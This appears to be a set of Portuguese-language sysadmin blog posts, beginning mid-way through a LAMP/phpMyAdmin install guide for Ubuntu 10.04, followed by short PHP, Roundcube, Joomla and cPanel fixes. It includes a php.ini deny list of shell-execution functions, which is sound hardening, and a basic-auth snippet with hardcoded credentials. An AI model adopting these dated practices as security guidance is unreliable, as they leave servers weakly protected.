Selecionando pacote previamente não selecionado php5-gd.
Desempacotando php5-gd (de …/php5-gd_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado php5-mcrypt.
Desempacotando php5-mcrypt (de …/php5-mcrypt_5.3.2-0ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado php5-mysql.
Desempacotando php5-mysql (de …/php5-mysql_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado phpmyadmin.
Desempacotando phpmyadmin (de …/phpmyadmin_4%3a3.3.2-1_all.deb) …
Processando gatilhos para man-db …
Processando gatilhos para libapache2-mod-php5 …
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]
Processando gatilhos para doc-base …
Processing 26 changed 1 added doc-base file(s)…
Registering documents with scrollkeeper…
Configurando dbconfig-common (1.8.44ubuntu1) …

Creating config file /etc/dbconfig-common/config with new version

Configurando wwwconfig-common (0.2.1) …
Configurando javascript-common (7) …

Configurando libapache2-mod-auth-mysql (4.3.9-12ubuntu1) …
Configurando libjs-mootools (1.2.4.0~debian1-1) …
Configurando libmcrypt4 (2.5.8-3.1) …

Configurando libt1-5 (5.1.2-3build1) …

Configurando php5-gd (5.3.2-1ubuntu4.1) …
Configurando php5-mcrypt (5.3.2-0ubuntu1) …
Configurando php5-mysql (5.3.2-1ubuntu4.1) …
Configurando phpmyadmin (4:3.3.2-1) …
dbconfig-common: writing config to /etc/dbconfig-common/phpmyadmin.conf

Creating config file /etc/dbconfig-common/phpmyadmin.conf with new version

Creating config file /etc/phpmyadmin/config-db.php with new version
granting access to database phpmyadmin for phpmyadmin@localhost: success.
verifying access for phpmyadmin@localhost: success.
creating database phpmyadmin: success.
verifying database phpmyadmin exists: success.
populating database via sql… done.
dbconfig-common: flushing administrative password
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place

Estamos muito próximos da reta final, agora basta devemos escolher qual container vai operar como servidor para o phpmyadmin, devemos escolhe apache (segundo a imagem a seguir retrata as opções):

Na imagem a seguir, que será a tela apresentada para você diga Ok para que o dbconfig ajuste a base do phpmyadmin:

E por fim devemos definir a senha de root do phpmyadmin, ressaltamos que esta senha fica a sua escolha, conforme a tela a seguir:

Pronto. Não precisa testar o banco de dados com funções php (mysql_connect…), na realidade, se seguir os pontos a risca (pré-testados) não ocorrerão problemas. Use o comando a seguir:

sudo /etc/init.d/apache2 restart

O apache será reiniciado.
Para finalizar, precisamos mover os arquivos do phpmyadmin para um ambiente visível na web, ou pelo menos visível quando digitarmos http://localhost/phpmyadmin cairmos exatamente na tela do phpmyadmin.

Use o seguinte comando:

cp -rp /usr/share/phpmyadmin /var/www

Pronto.
Se quiser testar o phpmyadmin basta acessar http://localhost/phpmyadmin e informar root como login e a senha que você definiu como root no momento da instalação do mysql.

Obrigado por sua atenção.
Abraços e visite sempre o AppUnix – Seu portal Unix-LIKE.

RoundCube não está permitindo excluir mensagens. Pastas Trash, Send e Junk (lixeira, enviados e rascunho) não aparecem

Standard

Se você não consegue ver as pastas do RoundCube “seus problemas SE ACABARAM-SE”.
O bendito, em sua versão stable (quase 100% stable) está com uma linda opção em off (FALSE).

Na pasta …roundcube/config/main.inc.php (se for no ispconfig: /home/admispconfig/ispconfig/web/roundcubemail/config/main.inc.php)
Apresentará este array aqui:

// automatically create the above listed default folders on login
$rcmail_config[‘create_default_folders’] = FALSE;

Salve seu dia assim:

$rcmail_config[‘create_default_folders’] = TRUE;

Pronto 😀

Roundcube fixed!

Warning: odbc_connect() [function.odbc-connect]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Could not use ‘(unknown)’; file already in use., SQL state S1000 in SQLConnect in

Standard

Antemão estou quase chorando por estar usando access, mas como se diz: “Sábio é o que dança conforme a música manda!”.
Estou desenvolvendo ferramentas para automatizar algumas replicações de dados de uma empresa e estou usando php (tecnologia) + access (isso é um banco?)

Este erro é ocasionado pelo fato de existir um drive fechando a conexão (na realidade aberto e acaba bloqueando novas conexões), por exemplo o Access abrindo a bendita base de dados access (.MDB).

Garanta que nada esteja abrindo o access database.

Uma forma de ver que isto está ocorrendo é observar se na pasta aonde o banco de dados esteja, exemplo nerdblog.mdb contenha também um arquivo nerdblog.ldb.

Ao fechar o driver ele automaticamente removerá o arquivo .LDB.

😀

Lamp2: Ubuntu 10.04 APACHE 2 Mysql 5 PHP 5 phpmyadmin (lucid lynx)

Standard

Boa noite ALL, é com muita alegria que informo:

Meu PC está com o Lucid Lynx (Ubuntu 10.4).
Este How to que preparei hoje vai ensinar como montar um ambiente de desenvolvimento web para aplicações php que utilizam-se do container apache e do banco de dados mysql.
Um ambiente LAMP2 (apache 2 mysql 5 php 5 e phpmyadmin) é fundamental para quem desenvolve e deseja testar sua app antes de envia-la para web, sem mais, vamos aos passos:

1 – Clique em Aplicativos->Acessórios->Terminal
2 – rode o comando: sudo apt-get install apache2
Este comando serve para instalar o apache 2.
A saída deste comando deverá ser semelhante a esta:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap
Pacotes sugeridos:
apache2-doc apache2-suexec apache2-suexec-custom
Os NOVOS pacotes a seguir serão instalados:
apache2 apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap
0 pacotes atualizados, 9 pacotes novos instalados, 0 a serem removidos e 0 não atualizados.
É preciso baixar 3328kB de arquivos.
Depois desta operação, 10,1MB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
0% [Aguardando por cabeçalhos]
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main libapr1 1.3.8-1build1 [116kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1 1.3.9+dfsg-3build1 [85,4kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1-dbd-sqlite3 1.3.9+dfsg-3build1 [27,1kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1-ldap 1.3.9+dfsg-3build1 [25,1kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2.2-bin 2.2.14-5ubuntu8 [2622kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-utils 2.2.14-5ubuntu8 [159kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2.2-common 2.2.14-5ubuntu8 [290kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-mpm-worker 2.2.14-5ubuntu8 [2364B]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2 2.2.14-5ubuntu8 [1482B]
Baixados 3328kB em 40s (81,4kB/s)
Selecionando pacote previamente não selecionado libapr1.
(Lendo banco de dados … 148327 arquivos e diretórios atualmente instalados).
Desempacotando libapr1 (de …/libapr1_1.3.8-1build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1.
Desempacotando libaprutil1 (de …/libaprutil1_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1-dbd-sqlite3.
Desempacotando libaprutil1-dbd-sqlite3 (de …/libaprutil1-dbd-sqlite3_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1-ldap.
Desempacotando libaprutil1-ldap (de …/libaprutil1-ldap_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado apache2.2-bin.
Desempacotando apache2.2-bin (de …/apache2.2-bin_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2-utils.
Desempacotando apache2-utils (de …/apache2-utils_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2.2-common.
Desempacotando apache2.2-common (de …/apache2.2-common_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2-mpm-worker.
Desempacotando apache2-mpm-worker (de …/apache2-mpm-worker_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2.
Desempacotando apache2 (de …/apache2_2.2.14-5ubuntu8_i386.deb) …
Processando gatilhos para man-db …
Processando gatilhos para ufw …
Processando gatilhos para ureadahead …
ureadahead will be reprofiled on next reboot
Configurando libapr1 (1.3.8-1build1) …

Configurando libaprutil1 (1.3.9+dfsg-3build1) …

Configurando libaprutil1-dbd-sqlite3 (1.3.9+dfsg-3build1) …
Configurando libaprutil1-ldap (1.3.9+dfsg-3build1) …
Configurando apache2.2-bin (2.2.14-5ubuntu8) …
Configurando apache2-utils (2.2.14-5ubuntu8) …
Configurando apache2.2-common (2.2.14-5ubuntu8) …
Enabling site default.
Enabling module alias.
Enabling module autoindex.
Enabling module dir.
Enabling module env.
Enabling module mime.
Enabling module negotiation.
Enabling module setenvif.
Enabling module status.
Enabling module auth_basic.
Enabling module deflate.
Enabling module authz_default.
Enabling module authz_user.
Enabling module authz_groupfile.
Enabling module authn_file.
Enabling module authz_host.
Enabling module reqtimeout.

Configurando apache2-mpm-worker (2.2.14-5ubuntu8) …
* Starting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando apache2 (2.2.14-5ubuntu8) …

Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place

Ressalto que usei o gestor de pacotes e habilitei o suporte a pacotes instáveis e também o repositório partner (mais abaixo posto como fazer).

Ainda no console use o comando abaixo:

sudo apt-get install php5 libapache2-mod-php5
Isto servirá para instalar o php5 e ainda integra-lo como DSO no apache (como módulo).
A saída deste comando será semelhante a esta:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
apache2-mpm-prefork php5-common
Pacotes sugeridos:
php-pear php5-suhosin
Os pacotes a seguir serão REMOVIDOS:
apache2-mpm-worker
Os NOVOS pacotes a seguir serão instalados:
apache2-mpm-prefork libapache2-mod-php5 php5 php5-common
0 pacotes atualizados, 4 pacotes novos instalados, 1 a serem removidos e 0 não atualizados.
É preciso baixar 3376kB de arquivos.
Depois desta operação, 8790kB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-mpm-prefork 2.2.14-5ubuntu8 [2422B]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-common 5.3.2-1ubuntu4.1 [541kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main libapache2-mod-php5 5.3.2-1ubuntu4.1 [2831kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5 5.3.2-1ubuntu4.1 [1114B]
Baixados 3376kB em 8s (389kB/s)
dpkg: apache2-mpm-worker: problemas de dependência, mas removendo assim mesmo conforme pedido:
apache2 depende de apache2-mpm-worker (= 2.2.14-5ubuntu8) | apache2-mpm-prefork (= 2.2.14-5ubuntu8) | apache2-mpm-event (= 2.2.14-5ubuntu8) | apache2-mpm-itk (= 2.2.14-5ubuntu8); porém:
Pacote apache2-mpm-worker está para ser removido.
Pacote apache2-mpm-prefork não está instalado.
Pacote apache2-mpm-event não está instalado.
Pacote apache2-mpm-itk não está instalado.
(Lendo banco de dados … 148902 arquivos e diretórios atualmente instalados).
Removendo apache2-mpm-worker …
* Stopping web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
… waiting [ OK ]
Selecionando pacote previamente não selecionado apache2-mpm-prefork.
(Lendo banco de dados … 148895 arquivos e diretórios atualmente instalados).
Desempacotando apache2-mpm-prefork (de …/apache2-mpm-prefork_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado php5-common.
Desempacotando php5-common (de …/php5-common_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado libapache2-mod-php5.
Desempacotando libapache2-mod-php5 (de …/libapache2-mod-php5_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado php5.
Desempacotando php5 (de …/php5_5.3.2-1ubuntu4.1_all.deb) …
Configurando apache2-mpm-prefork (2.2.14-5ubuntu8) …
* Starting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando php5-common (5.3.2-1ubuntu4.1) …
Configurando libapache2-mod-php5 (5.3.2-1ubuntu4.1) …

Creating config file /etc/php5/apache2/php.ini with new version
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando php5 (5.3.2-1ubuntu4.1) …

Já que estamos na metade do caminho o ideal seria dar um restart no apache para garantir que ele leu seu conf.
Use o comando:

sudo /etc/init.d/apache2 restart

A saída deverá ser parecida com:

* Restarting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
… waiting apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Para garantir que o apache está interpretando códigos php (fazendo uso do interpretador como módulo) podemos editar um arquivo e testa-lo. use o comando abaixo:

sudo vi /var/www/index.php

Dentro deste arquivo informe:

escreva : e depois escreva wq! e pressione enter, ficando algo como :wq! , você salvará o arquivo e sairá do vi.
Feito isto acesse o arquivo para ver se a mensagem nerdblog é 10 aparece, caso sim, sucesso total! Do contrário releia este manual!
Este teste pode ser feito em http://localhost/index.php

Para instalar o mysql como servidor de banco de dados devemos usar o seguinte comando:
sudo apt-get install mysql-server
A saída deste comando deverá assemelhar-se com:

Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-common 5.1.41-3ubuntu12 [97,1kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/main libnet-daemon-perl 0.43-1 [46,9kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/main libplrpc-perl 0.2020-2 [36,0kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libdbi-perl 1.609-1build1 [798kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/main libmysqlclient16 5.1.41-3ubuntu12 [1931kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/main libdbd-mysql-perl 4.012-1ubuntu1 [135kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-client-core-5.1 5.1.41-3ubuntu12 [176kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-client-5.1 5.1.41-3ubuntu12 [8136kB]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server-core-5.1 5.1.41-3ubuntu12 [4711kB]
Obter:10 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server-5.1 5.1.41-3ubuntu12 [7007kB]
Obter:11 http://br.archive.ubuntu.com/ubuntu/ lucid/main libhtml-template-perl 2.9-1 [65,8kB]
Obter:12 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server 5.1.41-3ubuntu12 [93,0kB]
Baixados 23,2MB em 1min 58s (196kB/s)
Pré-configurando pacotes …
Selecionando pacote previamente não selecionado mysql-common.
(Lendo banco de dados … 150463 arquivos e diretórios atualmente instalados).
Desempacotando mysql-common (de …/mysql-common_5.1.41-3ubuntu12_all.deb) …
Selecionando pacote previamente não selecionado libnet-daemon-perl.
Desempacotando libnet-daemon-perl (de …/libnet-daemon-perl_0.43-1_all.deb) …
Selecionando pacote previamente não selecionado libplrpc-perl.
Desempacotando libplrpc-perl (de …/libplrpc-perl_0.2020-2_all.deb) …
Selecionando pacote previamente não selecionado libdbi-perl.
Desempacotando libdbi-perl (de …/libdbi-perl_1.609-1build1_i386.deb) …
Selecionando pacote previamente não selecionado libmysqlclient16.
Desempacotando libmysqlclient16 (de …/libmysqlclient16_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado libdbd-mysql-perl.
Desempacotando libdbd-mysql-perl (de …/libdbd-mysql-perl_4.012-1ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado mysql-client-core-5.1.
Desempacotando mysql-client-core-5.1 (de …/mysql-client-core-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado mysql-client-5.1.
Desempacotando mysql-client-5.1 (de …/mysql-client-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado mysql-server-core-5.1.
Desempacotando mysql-server-core-5.1 (de …/mysql-server-core-5.1_5.1.41-3ubuntu12_i386.deb) …
Processando gatilhos para man-db …
Configurando mysql-common (5.1.41-3ubuntu12) …
Selecionando pacote previamente não selecionado mysql-server-5.1.
(Lendo banco de dados … 150828 arquivos e diretórios atualmente instalados).
Desempacotando mysql-server-5.1 (de …/mysql-server-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado libhtml-template-perl.
Desempacotando libhtml-template-perl (de …/libhtml-template-perl_2.9-1_all.deb) …
Selecionando pacote previamente não selecionado mysql-server.
Desempacotando mysql-server (de …/mysql-server_5.1.41-3ubuntu12_all.deb) …
Processando gatilhos para ureadahead …
Processando gatilhos para man-db …
Configurando libnet-daemon-perl (0.43-1) …
Configurando libplrpc-perl (0.2020-2) …
Configurando libdbi-perl (1.609-1build1) …
Configurando libmysqlclient16 (5.1.41-3ubuntu12) …

Configurando libdbd-mysql-perl (4.012-1ubuntu1) …
Configurando mysql-client-core-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-client-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-server-core-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-server-5.1 (5.1.41-3ubuntu12) …
mysql start/running, process 4808

Configurando libhtml-template-perl (2.9-1) …
Configurando mysql-server (5.1.41-3ubuntu12) …
Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place


No meio desse esquema todo serão exibidas janelas que solicitarão a senha de administrador do mysql, semelhantes as imagens abaixo:

Outra tela:

Estas telas pedem para que você dê uma senha para o usuário root do mysql, escolha uma senha ao seu gosto e depois repita a mesma.

Agora iremos integrar o php + apache + mysql + phpmyadmin, para isto precisaremos usar o comando:

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

A saída deste comando deverá ser algo mais ou menos parecido com isto aqui:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
dbconfig-common javascript-common libjs-mootools libmcrypt4 libt1-5 php5-gd php5-mcrypt wwwconfig-common
Pacotes sugeridos:
libmcrypt-dev mcrypt postgresql-client apache apache-ssl
Os NOVOS pacotes a seguir serão instalados:
dbconfig-common javascript-common libapache2-mod-auth-mysql libjs-mootools libmcrypt4 libt1-5 php5-gd php5-mcrypt php5-mysql phpmyadmin wwwconfig-common
0 pacotes atualizados, 11 pacotes novos instalados, 0 a serem removidos e 0 não atualizados.
É preciso baixar 5404kB de arquivos.
Depois desta operação, 21,9MB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main dbconfig-common 1.8.44ubuntu1 [474kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/universe wwwconfig-common 0.2.1 [22,8kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/universe javascript-common 7 [3854B]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libapache2-mod-auth-mysql 4.3.9-12ubuntu1 [25,6kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/universe libjs-mootools 1.2.4.0~debian1-1 [248kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/universe libmcrypt4 2.5.8-3.1 [76,1kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main libt1-5 5.1.2-3build1 [155kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-gd 5.3.2-1ubuntu4.1 [34,8kB]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/universe php5-mcrypt 5.3.2-0ubuntu1 [15,2kB]
Obter:10 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-mysql 5.3.2-1ubuntu4.1 [64,2kB]
Obter:11 http://br.archive.ubuntu.com/ubuntu/ lucid/universe phpmyadmin 4:3.3.2-1 [4285kB]
Baixados 5404kB em 45s (118kB/s)
Pré-configurando pacotes …
Selecionando pacote previamente não selecionado dbconfig-common.
(Lendo banco de dados … 150920 arquivos e diretórios atualmente instalados).
Desempacotando dbconfig-common (de …/dbconfig-common_1.8.44ubuntu1_all.deb) …
Selecionando pacote previamente não selecionado wwwconfig-common.
Desempacotando wwwconfig-common (de …/wwwconfig-common_0.2.1_all.deb) …
Selecionando pacote previamente não selecionado javascript-common.
Desempacotando javascript-common (de …/javascript-common_7_all.deb) …
Selecionando pacote previamente não selecionado libapache2-mod-auth-mysql.
Desempacotando libapache2-mod-auth-mysql (de …/libapache2-mod-auth-mysql_4.3.9-12ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado libjs-mootools.
Desempacotando libjs-mootools (de …/libjs-mootools_1.2.4.0~debian1-1_all.deb) …
Selecionando pacote previamente não selecionado libmcrypt4.
Desempacotando libmcrypt4 (de …/libmcrypt4_2.5.8-3.1_i386.deb) …
Selecionando pacote previamente não selecionado libt1-5.
Desempacotando libt1-5 (de …/libt1-5_5.1.2-3build1_i386.deb) …
Selecionando pacote previamente não selecionado php5-gd.
Desempacotando php5-gd (de …/php5-gd_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado php5-mcrypt.
Desempacotando php5-mcrypt (de …/php5-mcrypt_5.3.2-0ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado php5-mysql.
Desempacotando php5-mysql (de …/php5-mysql_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado phpmyadmin.
Desempacotando phpmyadmin (de …/phpmyadmin_4%3a3.3.2-1_all.deb) …
Processando gatilhos para man-db …
Processando gatilhos para libapache2-mod-php5 …
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]
Processando gatilhos para doc-base …
Processing 26 changed 1 added doc-base file(s)…
Registering documents with scrollkeeper…
Configurando dbconfig-common (1.8.44ubuntu1) …

Creating config file /etc/dbconfig-common/config with new version

Configurando wwwconfig-common (0.2.1) …
Configurando javascript-common (7) …

Configurando libapache2-mod-auth-mysql (4.3.9-12ubuntu1) …
Configurando libjs-mootools (1.2.4.0~debian1-1) …
Configurando libmcrypt4 (2.5.8-3.1) …

Configurando libt1-5 (5.1.2-3build1) …

Configurando php5-gd (5.3.2-1ubuntu4.1) …
Configurando php5-mcrypt (5.3.2-0ubuntu1) …
Configurando php5-mysql (5.3.2-1ubuntu4.1) …
Configurando phpmyadmin (4:3.3.2-1) …
dbconfig-common: writing config to /etc/dbconfig-common/phpmyadmin.conf

Creating config file /etc/dbconfig-common/phpmyadmin.conf with new version

Creating config file /etc/phpmyadmin/config-db.php with new version
granting access to database phpmyadmin for phpmyadmin@localhost: success.
verifying access for phpmyadmin@localhost: success.
creating database phpmyadmin: success.
verifying database phpmyadmin exists: success.
populating database via sql… done.
dbconfig-common: flushing administrative password
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place

Neste meio tempo uma tela para escolher entre apache e lighttpd aparecerá, escolha apache. Veja:

Na primeira tela escolha OK e dê um tab para confirmar que aceita a opção.

A próxima tela pedirá uma senha de admin para o phpmyadmin, para isto defina algo seu. Veja a tela:

Costumo, após terminar uma instalação de integração como esta utilizar-me de lago, insira as seguintes linhas naquela página index.php usando sudo vim /var/www/index.php
Informe dentro dela o seguinte:

Acesse http://localhost/index.php

Se nada ocorrer tudo está 100%.

Quando terminar use o comando:
sudo /etc/init.d/apache2 restart

Isto vai fazer o apache reler todos os confs.

Para concluir precisamos levar o phpmyadmin para a pasta web afim de que possamos editar nossos bds. Para isto precisamos copiar o phpmyadmin para dentro do /var/www usando o comando:

cp -rp /usr/share/phpmyadmin /var/www

Sendo assim, para acessar somente precisamos de um http://localhost/phpmyadmin

A parte interessante no quesito repositório vem de um how to bem interessante, veja:
http://www.howtoforge.com/the-perfect-desktop-ubuntu-10.04-lucid-lynx

Warning: Parameter 2 to frontpage() expected to be a reference

Standard


Este é um problema que vem atormentando usuários joomla em suas versões 1.0.x (x são variantes). Isto pode ocorrer também pelo fato da versão do php estar sendo 5.3.x.
Para sanar este problema é necessário aplicar um patch substituindo 2 arquivos:

/includes/Cache/Lite/Function.php
#Resolve o valor de referência

/includes/vcard.class.php
#Resolve problemas com formulários.

O patch segue no link abaixo:
http://www.libphp.net/fix_joomla_10x_php_530.zip

Lista de funções para desabilitar em um ambiente CPANEL de Hospedagem de Sites compartilhada

Standard


Bem, se você quer mais segurança em um ambiente compartilhado você precisará de ajustar seu php.ini global (/usr/local/lib/php.ini) em seu servidor de hospedagem compartilhada afim de prevenir ataques usando recursos avançados do php.

Como faremos isto?

Procure pela linha disable_functions =

e depois do ‘=’ aplique as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Talvez você precisará do shell_exec para o caso do Fantástico Deluxe.
Avalie se vale a pena deixar esta função ativa e prossiga 😀

post_max_size uma informação a mais na hora de aumentar o UPLOAD no php.ini

Standard


Olá ALL,
As vezes erramos quando somente aumentamos diretivas do PHP visando upload, tais como:

max_execution_time,
upload_max_filesize,
e até mempory_limit.

Elas até que estão corretas, assim como max_execution_time, só que os forms que enviam dados (refiro-me a arquivos), fazem envio de arquivos pelo método post.
Sendo assim, se quisermos um upload de 96M em um servidor rodando php precisamos colocar no php.ini a informação de qual o tamanho máximo de envio de dados pelo POST.
A saída então seria:

post_max_size = 96M

Isto dentro do PHP.INI.

Pronto, após ajustes o apache deverá ser reiniciado.

Abraços galera!

Fatal error: Allowed memory size PHP

Standard

Esse erro é mais comum que feijão com arroz, mas para sanar este cara localize o php.ini do seu servidor e aumente o parâmetro

memory_limit = -1
(-1 indica uso infinito de memória)

Recomendo colocar algo simples como:

memory_limit = 32M

Reinicie o apache e tudo estará sanado -> service httpd restart (em caso de debian e afins /etc/init.d/apache2 restart)

Abraços.

PHP 5.2.11 LIBERADO! Cpanel Já fez barulho quanto a isto hein!

Standard

Galera, para quem gosta de manter-se atualizado, a Zend (pai do php) lançou juntamente com a equipe de desenvolvimento o php 5.2.11. Vale a pena o update devido a quantidade de bugs corrigidos.

http://www.php.net

Para os usuários de cpanel o easyapache já está liberando disponibilizando junto ao whm, vide:
http://changelog.cpanel.net/?treeview=easyapache

embedded by Embedded Video

Download Video

Problema na instalação ou Uso do IonCube no Plesk Linux

Standard

Para localizar o problema com o IonCube no plesk basta rodar o comando abaixo:

grep -iR ioncube /etc/php*
/etc/php.d/ioncube.ini:zend_extension=/usr/lib/php/ioncube/ioncube_loader_lin_5.2.so
/etc/php.d/ioncube-loader.ini:zend_extension=/usr/lib/php/modules//php_ioncube_loader_lin_5.1.so

Pegue o segundo valor e comente ele, ou seja, vim /etc/php.d/ioncube-loader.ini e na linha coloca ; antes de tudo, isto deixará desabilitado.

Após use

php -v e verá que o seu plesk está ok.

Como fazer o seu script php solicitar autenticação usando header

Standard

Uma das formas mais legais que se tem de fazer autenticação de diretório com caixa de diálogo no browser é usando a função header do php e mandando brasa!

Um exemplo prático para você:

function checker($user, $pw) {
if( ($user == “nome_do_login”) && ($pw == “password”) ) {
return true;
} else {
return false;
}
}

if( !(checker($_SERVER[‘PHP_AUTH_USER’], $_SERVER[‘PHP_AUTH_PW’])) ) {
header(‘WWW-Authenticate: Basic realm=”Autentique-se”‘);
header(‘HTTP/1.0 401 Unauthorized’);
echo “Dados incorretos.”;
exit;
}

É isso!